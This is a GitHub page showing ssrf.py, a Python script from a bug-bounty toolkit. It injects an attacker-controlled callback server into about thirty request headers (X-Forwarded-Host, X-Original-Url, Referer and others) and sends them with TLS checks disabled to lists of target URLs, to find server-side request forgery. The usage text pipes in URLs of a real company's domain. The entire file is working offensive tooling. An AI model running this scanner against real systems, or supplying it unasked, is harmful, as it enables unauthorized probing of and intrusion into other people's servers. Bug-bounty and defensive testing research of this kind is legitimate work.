forked from m4ll0k/BBTz
-
Notifications
You must be signed in to change notification settings - Fork 0
/
ssrf.py
68 lines (58 loc) · 2.09 KB
/
ssrf.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
#!/usr/bin/python
# m4ll0k - github.com/m4ll0k
import requests
import urllib3
import sys
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
injectable_headers = [
"Proxy-Host","Request-Uri","X-Forwarded","X-Forwarded-By","X-Forwarded-For",
"X-Forwarded-For-Original","X-Forwarded-Host","X-Forwarded-Server","X-Forwarder-For",
"X-Forward-For","Base-Url","Http-Url","Proxy-Url","Redirect","Real-Ip","Referer","Referer",
"Referrer","Refferer","Uri","Url","X-Host","X-Http-Destinationurl","X-Http-Host-Override",
"X-Original-Remote-Addr","X-Original-Url","X-Proxy-Url","X-Rewrite-Url","X-Real-Ip","X-Remote-Addr"
]
def read_file(file_path:str)->None:
try:
return [x.strip() for x in open(file_path,'r+')]
except Exception as err:
sys.exit(
print('[ERROR] %s'%err)
)
def url_check(url:str)->str:
url = url.replace(':80','').replace(':443','')
return url
def main(url:str,ip:str)->None:
headers = {
'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0 Safari/605.1.15'
}
for header in injectable_headers:
headers[header] = ip
try:
#print('[ + ] URL: %s'%url)
request = requests.get(
url = url_check(url),
headers = headers,
verify = False,
allow_redirects = False
)
print('[ + ] Code: {code} - {url}'.format(code=request.status_code,url=request.url))
except Exception as err:
sys.exit(
print('[ERROR] '+err)
)
def usage():
print('Usage:\n\tpython3 {tool} <targets.txt> <your_server>\n\tgau uber.com | python3 {tool} <your_server>'.format(tool=sys.argv[0]))
sys.exit(0)
if len(sys.argv) == 1:
usage()
if len(sys.argv) == 3:
for url in read_file(sys.argv[1]):
main(url,sys.argv[2])
else:
for target in sys.stdin.readlines():
target_ = target.strip()
if len(sys.argv) == 1 or len(sys.argv) > 2:
usage()
if target == '\n':
usage()
main(target_,sys.argv[1])